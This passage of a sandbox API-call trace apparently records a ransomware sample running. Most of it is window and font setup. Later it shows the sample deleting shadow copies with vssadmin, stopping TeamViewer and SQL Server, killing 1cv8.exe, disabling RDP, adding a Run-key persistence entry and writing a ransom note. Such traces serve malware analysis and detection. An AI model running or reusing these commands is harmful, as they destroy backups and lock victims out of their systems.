font=0x14eb30) returned 0x0 [0116.016] CoTaskMemFree (pv=0x52fd90) [0116.017] CoTaskMemAlloc (cb=0x5c) returned 0x52f070 [0116.018] CoTaskMemFree (pv=0x52f070) [0116.019] CoTaskMemAlloc (cb=0x5c) returned 0x52f5b0 [0116.019] CoTaskMemFree (pv=0x52f5b0) [0116.021] GdipGetFontUnit (font=0x1ae934f0, unit=0x14eaa0) returned 0x0 [0116.021] GdipGetFontSize (font=0x1ae934f0, size=0x14eaac) returned 0x0 [0116.022] GdipGetFontStyle (font=0x1ae934f0, style=0x14ea98) returned 0x0 [0116.028] GdipGetFamily (font=0x1ae934f0, family=0x14ea90) returned 0x0 [0116.036] GdipGetFontSize (font=0x1ae934f0, size=0x20f24f8) returned 0x0 [0116.036] ReleaseDC (hWnd=0x0, hDC=0x110106ca) returned 1 [0116.039] GetDC (hWnd=0x0) returned 0x9010784 [0116.040] GdipCreateFromHDC (hdc=0x9010784, graphics=0x14eaa8) returned 0x0 [0116.045] GdipGetDpiY (graphics=0x1beb67f0, dpi=0x20f26d0) returned 0x0 [0116.046] GdipGetFontHeight (font=0x1ae934f0, graphics=0x1beb67f0, height=0x14eaa4) returned 0x0 [0116.047] GdipGetEmHeight (family=0x1bea9f00, style=0, EmHeight=0x14eaa8) returned 0x0 [0116.048] GdipGetLineSpacing (family=0x1bea9f00, style=0, LineSpacing=0x14eaa8) returned 0x0 [0116.048] GdipDeleteGraphics (graphics=0x1beb67f0) returned 0x0 [0116.113] ReleaseDC (hWnd=0x0, hDC=0x9010784) returned 1 [0116.120] GdipCreateFont (fontFamily=0x1bea9f00, emSize=0x7ff85d31dc95, style=0, unit=0x3, font=0x20f2660) returned 0x0 [0116.120] GdipGetFontSize (font=0x1ae9ed70, size=0x20f2668) returned 0x0 [0116.121] GdipDeleteFont (font=0x1ae934f0) returned 0x0 [0116.126] GetDC (hWnd=0x0) returned 0x9010784 [0116.126] GdipCreateFromHDC (hdc=0x9010784, graphics=0x14eb58) returned 0x0 [0116.127] CoTaskMemAlloc (cb=0x5c) returned 0x52f150 [0116.127] GdipGetLogFontW (font=0x1ae9ed70, graphics=0x1beb67f0, logfontW=0x52f150) returned 0x0 [0116.131] CoTaskMemFree (pv=0x52f150) [0116.131] CoTaskMemAlloc (cb=0x5c) returned 0x52f5b0 [0116.131] CoTaskMemFree (pv=0x52f5b0) [0116.132] CoTaskMemAlloc (cb=0x5c) returned 0x52f150 [0116.132] CoTaskMemFree (pv=0x52f150) [0116.132] GdipDeleteGraphics (graphics=0x1beb67f0) returned 0x0 [0116.132] ReleaseDC (hWnd=0x0, hDC=0x9010784) returned 1 [0116.133] CoTaskMemAlloc (cb=0x5c) returned 0x52f770 [0116.133] CreateFontIndirectW (lplf=0x52f770) returned 0x390a09d7 [0116.133] CoTaskMemFree (pv=0x52f770) [0116.135] SelectObject (hdc=0x9010887, h=0x390a09d7) returned 0x18a0048 [0116.135] GetTextMetricsW (in: hdc=0x9010887, lptm=0x14edd8 | out: lptm=0x14edd8) returned 1 [0116.136] GetTextExtentPoint32W (in: hdc=0x9010887, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x20f2a48 | out: psizl=0x20f2a48) returned 1 [0116.139] SelectObject (hdc=0x9010887, h=0x18a0048) returned 0x390a09d7 [0116.140] DeleteDC (hdc=0x9010887) returned 1 [0116.141] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x7ff8749c0000 [0116.143] AdjustWindowRectEx (in: lpRect=0x14ea40, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x14ea40) returned 1 [0116.144] AdjustWindowRectEx (in: lpRect=0x14ecc0, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x14ecc0) returned 1 [0116.144] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x7ff8749c0000 [0116.144] AdjustWindowRectEx (in: lpRect=0x14e930, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x14e930) returned 1 [0116.144] AdjustWindowRectEx (in: lpRect=0x14eab0, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x14eab0) returned 1 [0116.149] GetSystemMetrics (nIndex=34) returned 136 [0116.149] GetSystemMetrics (nIndex=35) returned 39 [0116.154] GetCurrentActCtx (in: lphActCtx=0x14eff0 | out: lphActCtx=0x14eff0*=0x0) returned 1 [0116.154] ActivateActCtx (in: hActCtx=0x52ddd8, lpCookie=0x14f030 | out: hActCtx=0x52ddd8, lpCookie=0x14f030) returned 1 [0116.164] GetCurrentActCtx (in: lphActCtx=0x14ec80 | out: lphActCtx=0x14ec80*=0x52ddd8) returned 1 [0116.164] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x7ff872050000 [0116.165] AdjustWindowRectEx (in: lpRect=0x14eba0, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x14eba0) returned 1 [0116.165] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0116.165] CreateWindowExW (dwExStyle=0x50000, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r8_ad1", lpWindowName="Form1", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=300, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x8036a [0116.165] SetWindowLongPtrW (hWnd=0x8036a, nIndex=-4, dwNewLong=0x7ff880044a40) returned 0x1ac9085c [0116.166] GetWindowLongPtrW (hWnd=0x8036a, nIndex=-4) returned 0x7ff880044a40 [0116.167] SetWindowLongPtrW (hWnd=0x8036a, nIndex=-4, dwNewLong=0x1ac9094c) returned 0x7ff880044a40 [0116.167] GetWindowLongPtrW (hWnd=0x8036a, nIndex=-4) returned 0x1ac9094c [0116.167] GetWindowLongPtrW (hWnd=0x8036a, nIndex=-16) returned 0x6cf0000 [0116.167] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x81, wParam=0x0, lParam=0x14e300) returned 0x1 [0116.170] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x83, wParam=0x0, lParam=0x14e3b0) returned 0x0 [0116.171] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x1, wParam=0x0, lParam=0x14e2e0) returned 0x0 [0116.171] GetClientRect (in: hWnd=0x8036a, lpRect=0x14dd30 | out: lpRect=0x14dd30) returned 1 [0116.171] GetWindowRect (in: hWnd=0x8036a, lpRect=0x14dd30 | out: lpRect=0x14dd30) returned 1 [0116.172] SetWindowTextW (hWnd=0x8036a, lpString="Form1") returned 1 [0116.172] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0xc, wParam=0x0, lParam=0x20edeec) returned 0x1 [0116.190] GetProcessWindowStation () returned 0xcc [0116.197] GetUserObjectInformationA (in: hObj=0xcc, nIndex=1, pvInfo=0x20f3b28, nLength=0xc, lpnLengthNeeded=0x14dac0 | out: pvInfo=0x20f3b28, lpnLengthNeeded=0x14dac0) returned 1 [0116.208] SetConsoleCtrlHandler (HandlerRoutine=0x1ac9099c, Add=1) returned 1 [0116.211] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0116.211] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0116.214] GetClassInfoW (in: hInstance=0x400000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWndClass=0x20f3be8 | out: lpWndClass=0x20f3be8) returned 0 [0116.215] CoTaskMemAlloc (cb=0x58) returned 0x5365e0 [0116.215] RegisterClassW (lpWndClass=0x14d8d0) returned 0xc20a [0116.216] CoTaskMemFree (pv=0x5365e0) [0116.218] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x401f6 [0116.265] NtdllDefWindowProc_W (hWnd=0x401f6, Msg=0x81, wParam=0x0, lParam=0x14d1f0) returned 0x1 [0116.266] NtdllDefWindowProc_W (hWnd=0x401f6, Msg=0x83, wParam=0x0, lParam=0x14d2a0) returned 0x0 [0116.266] NtdllDefWindowProc_W (hWnd=0x401f6, Msg=0x1, wParam=0x0, lParam=0x14d190) returned 0x0 [0116.267] NtdllDefWindowProc_W (hWnd=0x401f6, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0116.267] NtdllDefWindowProc_W (hWnd=0x401f6, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0116.360] GetStartupInfoW (in: lpStartupInfo=0x20f42f8 | out: lpStartupInfo=0x20f42f8*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0116.362] GetParent (hWnd=0x8036a) returned 0x0 [0116.363] SetWindowLongPtrW (hWnd=0x8036a, nIndex=-8, dwNewLong=0x0) returned 0x0 [0116.370] GetSystemMetrics (nIndex=11) returned 32 [0116.370] GetSystemMetrics (nIndex=12) returned 32 [0116.370] GetDC (hWnd=0x0) returned 0x9010784 [0116.371] GetDeviceCaps (hdc=0x9010784, index=12) returned 32 [0116.371] GetDeviceCaps (hdc=0x9010784, index=14) returned 1 [0116.371] ReleaseDC (hWnd=0x0, hDC=0x9010784) returned 1 [0116.372] CreateIconFromResourceEx (presbits=0x20f6ef8, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x170365 [0116.373] GetSystemMetrics (nIndex=49) returned 16 [0116.373] GetSystemMetrics (nIndex=50) returned 16 [0116.376] CreateIconFromResourceEx (presbits=0x20f8000, dwResSize=0x468, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x901c5 [0116.378] SendMessageW (hWnd=0x8036a, Msg=0x80, wParam=0x0, lParam=0x901c5) returned 0x0 [0116.378] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x80, wParam=0x0, lParam=0x901c5) returned 0x0 [0116.379] SendMessageW (hWnd=0x8036a, Msg=0x80, wParam=0x1, lParam=0x170365) returned 0x0 [0116.379] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x80, wParam=0x1, lParam=0x170365) returned 0x0 [0116.380] GetSystemMenu (hWnd=0x8036a, bRevert=0) returned 0x8028b [0116.405] GetWindowPlacement (in: hWnd=0x8036a, lpwndpl=0x14ec88 | out: lpwndpl=0x14ec88) returned 1 [0116.406] EnableMenuItem (hMenu=0x8028b, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0116.406] EnableMenuItem (hMenu=0x8028b, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0116.406] EnableMenuItem (hMenu=0x8028b, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0116.406] EnableMenuItem (hMenu=0x8028b, uIDEnableItem=0xf120, uEnable=0x1) returned 0 [0116.406] EnableMenuItem (hMenu=0x8028b, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0116.407] GetClientRect (in: hWnd=0x8036a, lpRect=0x14ed50 | out: lpRect=0x14ed50) returned 1 [0116.407] GetClientRect (in: hWnd=0x8036a, lpRect=0x14ec80 | out: lpRect=0x14ec80) returned 1 [0116.407] GetWindowRect (in: hWnd=0x8036a, lpRect=0x14ec80 | out: lpRect=0x14ec80) returned 1 [0116.407] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x7ff872050000 [0116.407] GetWindowLongPtrW (hWnd=0x8036a, nIndex=-16) returned 0x6cf0000 [0116.408] GetWindowTextLengthW (hWnd=0x8036a) returned 5 [0116.408] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0116.408] GetSystemMetrics (nIndex=42) returned 0 [0116.409] GetWindowTextW (in: hWnd=0x8036a, lpString=0x14ea90, nMaxCount=6 | out: lpString="Form1") returned 5 [0116.409] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0xd, wParam=0x6, lParam=0x14ea90) returned 0x5 [0116.410] GetWindowTextLengthW (hWnd=0x8036a) returned 5 [0116.410] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0116.410] GetSystemMetrics (nIndex=42) returned 0 [0116.410] GetWindowTextW (in: hWnd=0x8036a, lpString=0x14ea90, nMaxCount=6 | out: lpString="Form1") returned 5 [0116.410] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0xd, wParam=0x6, lParam=0x14ea90) returned 0x5 [0116.410] GetWindowLongPtrW (hWnd=0x8036a, nIndex=-16) returned 0x6cf0000 [0116.410] GetWindowLongPtrW (hWnd=0x8036a, nIndex=-20) returned 0x50100 [0116.410] SetWindowLongPtrW (hWnd=0x8036a, nIndex=-16, dwNewLong=0x2cf0000) returned 0x6cf0000 [0116.410] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x7c, wParam=0xfffffffffffffff0, lParam=0x14eb50) returned 0x0 [0116.411] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x7d, wParam=0xfffffffffffffff0, lParam=0x14eb50) returned 0x0 [0117.006] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x901c5 [0117.007] SetWindowLongPtrW (hWnd=0x8036a, nIndex=-20, dwNewLong=0x50000) returned 0x50100 [0117.007] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x7c, wParam=0xffffffffffffffec, lParam=0x14eb50) returned 0x0 [0117.008] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x7d, wParam=0xffffffffffffffec, lParam=0x14eb50) returned 0x0 [0117.010] SetWindowPos (hWnd=0x8036a, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0117.010] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x46, wParam=0x0, lParam=0x14ebb0) returned 0x0 [0117.010] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x83, wParam=0x1, lParam=0x14eb80) returned 0x0 [0117.014] GetWindowPlacement (in: hWnd=0x8036a, lpwndpl=0x14e758 | out: lpwndpl=0x14e758) returned 1 [0117.014] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x47, wParam=0x0, lParam=0x14ebb0) returned 0x0 [0117.015] GetClientRect (in: hWnd=0x8036a, lpRect=0x14e5f0 | out: lpRect=0x14e5f0) returned 1 [0117.015] GetWindowRect (in: hWnd=0x8036a, lpRect=0x14e5f0 | out: lpRect=0x14e5f0) returned 1 [0117.018] RedrawWindow (hWnd=0x8036a, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0117.018] GetSystemMenu (hWnd=0x8036a, bRevert=0) returned 0x8028b [0117.018] GetWindowPlacement (in: hWnd=0x8036a, lpwndpl=0x14ec28 | out: lpwndpl=0x14ec28) returned 1 [0117.018] EnableMenuItem (hMenu=0x8028b, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0117.019] EnableMenuItem (hMenu=0x8028b, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0117.019] EnableMenuItem (hMenu=0x8028b, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0117.019] EnableMenuItem (hMenu=0x8028b, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0117.019] EnableMenuItem (hMenu=0x8028b, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0117.019] ShowWindow (hWnd=0x8036a, nCmdShow=5) returned 0 [0117.019] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0117.025] GetWindowTextLengthW (hWnd=0x8036a) returned 5 [0117.025] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0117.025] GetSystemMetrics (nIndex=42) returned 0 [0117.025] GetWindowTextW (in: hWnd=0x8036a, lpString=0x14e5c0, nMaxCount=6 | out: lpString="Form1") returned 5 [0117.025] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0xd, wParam=0x6, lParam=0x14e5c0) returned 0x5 [0117.323] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x5124b0 [0117.323] LocalAlloc (uFlags=0x0, uBytes=0x38) returned 0x509e60 [0121.657] ShellExecuteExW (in: pExecInfo=0x20fa310*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="vssadmin.exe", lpParameters=" delete shadows /all /quiet", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x20fa310*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="vssadmin.exe", lpParameters=" delete shadows /all /quiet", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x480)) returned 1 [0127.414] LocalFree (hMem=0x5124b0) returned 0x0 [0127.414] LocalFree (hMem=0x509e60) returned 0x0 [0127.785] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x564880 [0127.785] LocalAlloc (uFlags=0x0, uBytes=0x28) returned 0x5872e0 [0127.785] ShellExecuteExW (in: pExecInfo=0x20fa5f8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="net.exe", lpParameters=" stop TeamViewer /y", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x20fa5f8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="net.exe", lpParameters=" stop TeamViewer /y", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x48c)) returned 1 [0128.207] LocalFree (hMem=0x564880) returned 0x0 [0128.207] LocalFree (hMem=0x5872e0) returned 0x0 [0128.208] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x5551c0 [0128.208] LocalAlloc (uFlags=0x0, uBytes=0x38) returned 0x584a50 [0128.208] ShellExecuteExW (in: pExecInfo=0x20fa8a8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="vssadmin.exe", lpParameters=" delete shadows /all /quiet", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x20fa8a8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="vssadmin.exe", lpParameters=" delete shadows /all /quiet", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x490)) returned 1 [0128.224] LocalFree (hMem=0x5551c0) returned 0x0 [0128.225] LocalFree (hMem=0x584a50) returned 0x0 [0128.225] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x5876a0 [0128.225] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x5872e0 [0128.225] ShellExecuteExW (in: pExecInfo=0x20fab58*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="taskkill.exe", lpParameters=" /f /im 1cv8.exe", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x20fab58*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="taskkill.exe", lpParameters=" /f /im 1cv8.exe", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x494)) returned 1 [0130.111] LocalFree (hMem=0x5876a0) returned 0x0 [0130.112] LocalFree (hMem=0x5872e0) returned 0x0 [0130.113] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x564800 [0130.113] LocalAlloc (uFlags=0x0, uBytes=0xec) returned 0x520ef0 [0130.113] ShellExecuteExW (in: pExecInfo=0x20fae08*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="reg.exe", lpParameters=" add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x20fae08*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="reg.exe", lpParameters=" add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x49c)) returned 1 [0131.555] LocalFree (hMem=0x564800) returned 0x0 [0131.555] LocalFree (hMem=0x520ef0) returned 0x0 [0131.555] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x5642a0 [0131.555] LocalAlloc (uFlags=0x0, uBytes=0xe0) returned 0x573800 [0131.555] ShellExecuteExW (in: pExecInfo=0x20fb0b8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="reg.exe", lpParameters=" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"wininit\" /t REG_SZ /F /D \"C:\\windows\\wininit.exe\"", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x20fb0b8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="reg.exe", lpParameters=" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"wininit\" /t REG_SZ /F /D \"C:\\windows\\wininit.exe\"", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x4a0)) returned 1 [0131.573] LocalFree (hMem=0x5642a0) returned 0x0 [0131.574] LocalFree (hMem=0x573800) returned 0x0 [0131.574] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x564800 [0131.574] LocalAlloc (uFlags=0x0, uBytes=0x2a) returned 0x584210 [0131.574] ShellExecuteExW (in: pExecInfo=0x20fb368*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="net.exe", lpParameters=" stop mssqlserver /y", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x20fb368*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="net.exe", lpParameters=" stop mssqlserver /y", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x4a4)) returned 1 [0131.637] LocalFree (hMem=0x564800) returned 0x0 [0131.638] LocalFree (hMem=0x584210) returned 0x0 [0131.652] GetFullPathNameW (in: lpFileName="C:\\HOW TO RECOVER ENCRYPTED FILES.txt", nBufferLength=0x105, lpBuffer=0x14dea0, lpFilePart=0x0 | out: lpBuffer="C:\\HOW TO RECOVER ENCRYPTED FILES.txt", lpFilePart=0x0) returned 0x25 [0131.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x14e380) returned 1 [0131.653] CreateFileW (lpFileName="C:\\HOW TO RECOVER ENCRYPTED FILES.txt" (normalized: "c:\\how to recover encrypted files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x46c [0131.654] GetFileType (hFile=0x46c) returned 0x1 [0131.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x14e2f0) returned 1 [0131.655] GetFileType (hFile=0x46c) returned 0x1 [0131.664] WriteFile (in: hFile=0x46c, lpBuffer=0x20fe0c0*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x14e3c8, lpOverlapped=0x0 | out: lpBuffer=0x20fe0c0*, lpNumberOfBytesWritten=0x14e3c8*=0x800, lpOverlapped=0x0) returned 1 [0131.665] CloseHandle (hObject=0x46c) returned 1 [0132.151] GetACP () returned 0x4e4 [0134.744] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe.config", nBufferLength=0x105, lpBuffer=0x14db60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe.config", lpFilePart=0x0) returned 0x69 [0134.744] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe.config", nBufferLength=0x105, lpBuffer=0x14da50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe.config", lpFilePart=0x0) returned 0x69 [0137.913] GetCurrentProcess () returned 0xffffffffffffffff [0137.913] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14de68 | out: TokenHandle=0x14de68*=0x404) returned 1 [0137.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x14d890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", lpFilePart=0x0) returned 0x30 [0138.000] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x14df20 | out: lpFileInformation=0x14df20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0138.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x14d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0138.002] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x14df08 | out: lpFileInformation=0x14df08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, 